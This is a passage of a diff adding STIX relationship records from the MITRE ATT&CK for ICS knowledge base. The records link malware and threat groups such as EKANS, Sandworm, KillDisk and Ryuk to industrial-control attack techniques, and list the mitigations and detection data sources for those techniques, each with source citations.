"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e607bb66-e53f-4684-b3f1-36a997e27d01", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.087Z", + "relationship_type": "mitigates", + "description": "Protection devices should have minimal digital components to prevent exposure to related adversarial techniques. Examples include interlocks, rupture disks, release valves, etc. (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) \n", + "source_ref": "course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401", + "target_ref": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "external_references": [ + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c347b69c-e3f6-4eca-ba57-0781c7dc8eac", + "created": "2021-04-13T12:28:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Threat Intelligence February 2020", + "description": "Dragos Threat Intelligence 2020, February 03 EKANS Ransomware and ICS Operations Retrieved. 2021/04/12 ", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:48:00.088Z", + "description": "[EKANS](https://attack.mitre.org/software/S0605) masquerades itself as a valid executable with the filename update.exe. Many valid programs use the process name update.exe to perform background software updates. (Citation: Dragos Threat Intelligence February 2020)", + "relationship_type": "uses", + "source_ref": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--22448288-32d9-4d2c-be16-0784e119fff1", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:26:11.066Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c8a40335-90d6-496a-b4f9-1cc93d3fffc6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T17:00:17.249Z", + "modified": "2022-05-06T17:47:24.212Z", + "relationship_type": "mitigates", + "description": "A supply chain management program should include methods the assess the trustworthiness and technical maturity of a supplier, along with technical methods (e.g., code-signing, bill of materials) needed to validate the integrity of newly obtained devices and components. Develop procurement language that emphasizes the expectations for suppliers regarding the artifacts, audit records, and technical capabilities needed to validate the integrity of the devices supply chain. (Citation: Robert A. Martin January 2021)\n", + "source_ref": "course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "external_references": [ + { + "source_name": "Robert A. Martin January 2021", + "description": "Robert A. Martin 2021, January TRUSTING OUR SUPPLY CHAINS: A COMPREHENSIVE DATA-DRIVEN APPROACH Retrieved. 2021/04/12 ", + "url": "https://www.mitre.org/sites/default/files/publications/pr-20-01465-37-trusting-our-supply-chains-a-comprehensive-data-driven-approach.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--e156609f-c30b-4bf5-8a1b-9689ba778a14", + "created": "2023-03-31T17:44:45.164Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T17:54:45.912Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) transferred executable files as .txt and then renamed them to .exe, likely to avoid detection through extension tracking.(Citation: Dragos Crashoverride 2018)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--478cef79-cf4e-4b37-9562-b45cdeb088a4", + "created": "2022-09-26T20:46:23.812Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:30:58.676Z", + "description": "Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5bb313a8-8407-4ec1-a4b0-683ded7f3302", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "Kyle Wilhoit", + "description": "Kyle Wilhoit Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ICS Malware: Havex and Black Energy Retrieved. 2019/10/22 ", + "url": "https://www.youtube.com/watch?v=eywmb7UDODY&feature=youtu.be&t=939" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:19:26.117Z", + "description": "Execution of [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) relies on a user opening a trojanized installer attached to an email. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) (Citation: Kyle Wilhoit)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ee89466e-0655-4217-844d-fb8ea4f76247", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.065Z", + "relationship_type": "mitigates", + "description": "Filter for protocols and payloads associated with firmware activation or updating activity.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ca5c7ae7-5273-4888-bc50-183d6e200972", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.105Z", + "relationship_type": "mitigates", + "description": "Built-in browser sandboxes and application isolation may be used to contain web-based malware.\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--1e6da55a-ab6c-4583-9e20-583f82096497", + "created": "2022-09-26T14:40:01.334Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:49:58.047Z", + "description": "Monitor for new ICS protocol connections to existing assets or for device scanning (i.e., a host connecting to many devices) over ICS and enterprise protocols (e.g., ICMP, DCOM, WinRM).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--38a3c86b-c9bb-4a65-87c9-55429c68684f", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:32:41.938Z", + "description": "Monitor for newly constructed files copied to or from removable media.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--383e242a-72d4-4b40-8905-888595c34919", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kelly Jackson Higgins", + "description": "Kelly Jackson Higgins How a Manufacturing Firm Recovered from a Devastating Ransomware Attack Retrieved. 2019/11/03 ", + "url": "https://www.darkreading.com/attacks-breaches/how-a-manufacturing-firm-recovered-from-a-devastating-ransomware-attack/d/d-id/1334760" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:20:20.608Z", + "description": "An enterprise resource planning (ERP) manufacturing server was lost to the [Ryuk](https://attack.mitre.org/software/S0446) attack. The manufacturing process had to rely on paper and existing orders to keep the shop floor open. (Citation: Kelly Jackson Higgins)", + "relationship_type": "uses", + "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ffc5bbce-8d9c-4276-9dc6-efed5c01af8b", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:31:37.216Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) can move laterally through industrial networks by means of the SMB service. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a91002fe-21b2-4417-9c23-af712a7a035c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T11:15:26.506Z", + "modified": "2022-05-06T17:47:24.156Z", + "relationship_type": "mitigates", + "description": "Utilize code signatures to verify the integrity of the installed program on safety or control assets has not been changed.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d08fdedd-12f6-4681-9167-70d070432dee", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.208Z", + "relationship_type": "mitigates", + "description": "Perform inline allowlisting of automation protocol commands to prevent devices from sending unauthorized command or reporting messages. Allow/denylist techniques need to be designed with sufficient accuracy to prevent the unintended blocking of valid reporting messages.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--92d1fd4f-6cc7-4db5-82f8-f8caa5ff59f0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.130Z", + "relationship_type": "mitigates", + "description": "Protect files stored locally with proper permissions to limit opportunities for adversaries to remove indicators of their activity on the system. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0278ddbc-67d5-444d-8082-bf9974dee920", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:47:45.775Z", + "description": "Monitor for an authentication attempt by a user that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f8318ac4-8ed0-478d-be87-faa2c9d8a740", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Eduard Kovacs May 2018", + "description": "Eduard Kovacs 2018, May 21 Group linked to Shamoon attacks targeting ICS networks in Middle East and UK Retrieved. 2020/01/03 ", + "url": "https://www.cyberviser.com/2018/05/group-linked-to-shamoon-attacks-targeting-ics-networks-in-middle-east-and-uk/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:33:11.305Z", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) has been seen utilizing watering hole attacks to collect credentials which could be used to gain access into ICS networks. (Citation: Eduard Kovacs May 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bc3744d6-9275-4d91-8888-16d5f4d5187b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.112Z", + "relationship_type": "mitigates", + "description": "Use least privilege for service accounts. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--40f63b01-dc59-475d-826a-74f38c6e81b9", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:38:28.550Z", + "description": "Host-based implementations of this technique may utilize networking-based system calls or network utility commands (e.g., iptables) to locally intercept traffic. Monitor for relevant process creation events.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1110814e-81ff-4a23-9988-4b93e6f68a2b", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:09:35.145Z", + "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if reporting messages are blocked. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9a607f89-85b8-4fba-8eb7-7e4900ea693f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.203Z", + "relationship_type": "mitigates", + "description": "Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b452a076-6d4e-49f5-95ac-16264ef05b1d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov", + "description": "Anton Cherepanov BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry Retrieved. 2019/10/29 ", + "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:55:23.573Z", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) looks for and terminates two non-standard processes, one of which is an ICS application. (Citation: Anton Cherepanov)", + "relationship_type": "uses", + "source_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--34d4101b-b4c9-4ea3-a84d-81e84e7f5033", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.168Z", + "relationship_type": "mitigates", + "description": "Segment networks and systems appropriately to reduce access to critical system and services communications.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9ffc1ecb-09de-4841-a1f6-ebd1f3be7cea", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:40:06.988Z", + "description": "Monitor for a file that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2ecc567f-3aaa-4bd8-935f-4808d177a552", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.173Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--04bf72de-75ba-4d95-ad24-f93ad835180c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:54:26.520Z", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) erases the master boot record (MBR) and system logs, leaving the system unusable. (Citation: Booz Allen Hamilton)", + "relationship_type": "uses", + "source_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7c1eee62-3307-4e25-8a20-919ccd56ec1c", + "created": 